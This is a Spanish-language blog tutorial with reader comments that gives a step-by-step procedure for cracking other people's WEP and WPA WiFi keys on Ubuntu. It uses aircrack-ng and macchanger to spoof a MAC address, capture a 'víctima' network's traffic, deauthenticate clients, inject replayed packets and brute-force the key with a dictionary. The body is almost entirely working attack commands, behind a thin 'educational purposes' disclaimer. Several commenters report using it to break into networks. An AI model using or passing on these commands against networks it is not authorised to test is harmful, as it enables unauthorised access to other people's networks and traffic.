Crackea una red WiFi WEP y WPA usando Ubuntu

Este es el primer post de hacking de Apuntux, y espero que les sirva de utilidad. Recuerda que este tutorial está hecho únicamente para fines educativos y usa el programa bajo tu propia responsabilidad. El tutorial está hecho con Ubuntu 10.04, aunque la suite aircrack está disponible en versiones anteriores. Antes de nada, necesitarás lo siguiente:

  • Diccionario (no es uno cualquiera, descarga uno de AQUÍ) El diccionario sólo se utilizará para crackear WPA.
  • Un cliente conectado.
Una vez que hemos visto los requisitos podremos empezar:
Antes de nada, instalamos la suite Aircrack:
sudo apt-get install aircrack-ng
Y luego Macchanger:
sudo apt-get install macchanger
Ahora nos tenemos que asegurar de que no estemos conectados a ninguna red inalámbrica.
Ahora viene una parte muy importante, ya que si no puedes activar modo monitor en tu tarjeta de red no podrás crackear.
sudo airmon-ng start wlan0
Vemos que nos sale que se activó en mon0, asi que trabajaremos con mon0.
Damos de baja mon0.
sudo ifconfig mon0 down
Cambiamos la dirección MAC de mon0 por 00:11:22:33:44:55:
sudo macchanger -m 00:11:22:33:44:55 mon0
Damos de alta mon0:
sudo ifconfig mon0 up
Ahora escaneamos las redes disponibles, y encontraremos a nuestra víctima:
sudo airodump-ng mon0
Detenemos la escaneada pulsando Control+C
Ahora ejecutamos airodump-ng, cambiando los datos de los corchetes por los de nuestra victima: 
sudo airodump-ng -c [# canal] -w [nombre red] --bssid [direccion MAC] mon0
Abrimos otra terminal SIN CERRAR LA ANTERIOR y empezamos el ataque a la red, cambiando los datos de los corchetes por los de nuestra victima :
PARA WEP:
sudo aireplay-ng -1 6000 -a [direccion MAC] -h 00:11:22:33:44:55 mon0 

PARA WPA:
sudo aireplay-ng -0 1 -a [direccion MAC] -c [STATION] mon0
 Abrimos otra terminal SIN CERRAR LA ANTERIOR y ejecutamos en la nueva terminal cambiando los datos de los corchetes por los de nuestra victima. 
PARA WEP:
sudo aireplay-ng -2 -p 0841 -c FF:F:F:F:F:F -b [direccion MAC] -h 00:11:22:33:44:55 mon0
PARA WPA:
sudo aircrack-ng -w [/directorio/del/diccionario.lst] [NOMBRE]*.cap
PARA WEP:
Abrimos la 4ta y ultima terminal SIN CERRAR LA ANTERIOR y ejecutamos en la nueva terminal cambiando los datos de los corchetes por los de nuestra victima. 
sudo aircrack-ng -z [nombre red]*.cap

Esperamos a que descrifre la clave y cuando esté lista vuelves a activar la red e ingresas la clave.
Y para acabar este tutorial te doy un consejo: si tu router admite cambio de tipo de clave, configúrala en WPA, ya que éstas son más difíciles de  crackear y la gente que quiera robar una casi siempre opta por las WEP.

10 comentarios: (+add yours?)

Anónimo dijo...

que eres un fenomeno maxote ajajajajaja ubuntu linux seco

Roberto dijo...

Fijate que mi compu es una lenovo 3000 c200 y la parte de wlan0 no me aparece para poner en modo monitor, en mi compu la red inalambrica aparece como eth1 y probe ponerla en modo monitor y al darle el comando me sale monitor mode enable pero ya de ahi no paso porque no se que cambiar en las lineas que das, de antemano gracias por tu ayuda

Anónimo dijo...

como crakeo la clave wap ya hice el ultimo paso y cual es el tipo de diccionario que tengo que bajar, saludos y mil gracias

Jazumaru dijo...

Mus bonito..............
pero te falto comentar que en algunos casos (la mayoria creo yo) se tienen que parchar algunos modulos compilarlos y reinstalarlos,en algunos otros casos no puedes cambiar la mac de la tarjeta de red; que el aircrack-ptw puede sacar la clave wep en la mitad del tiempo que el aircrack-ng
y que conseguir la clave de una wpa es tremendamente cab&%#
ya que como minimo deve tener ocho caracteres

aun asi buen resumen y gracias por el link de los dic ;)

LAZARIUXINC dijo...

donde puedo conseguir los diccionarios para poder hacer el hacking con una red wpa

LAZARIUXINC dijo...

perdón como saber cual elegir cual es el bueno o cualquiera sirve de toda esa lista que hay ???????????

Anónimo dijo...

buena si me sirvio el crack gracias loco

Anónimo dijo...

Te faltó explicar los detalles más pequeños pero más importantes como lo que va en cada parámetro al que le has puesto nombre genérico

Anónimo dijo...

Para las wep no necesitas diccionario,,,, constantemente hackeo wep....
pero ahora quiero hack unas wpa2,,,,,,,, funciona con esta explicacion.......?


porfa.....llego hasta
aireplay-ng -0 1 -a [mac de victina] -c [aqui que va] mon0

Anónimo dijo...

cual es la direccion MAC

Publicar un comentario

Deja tu comentario...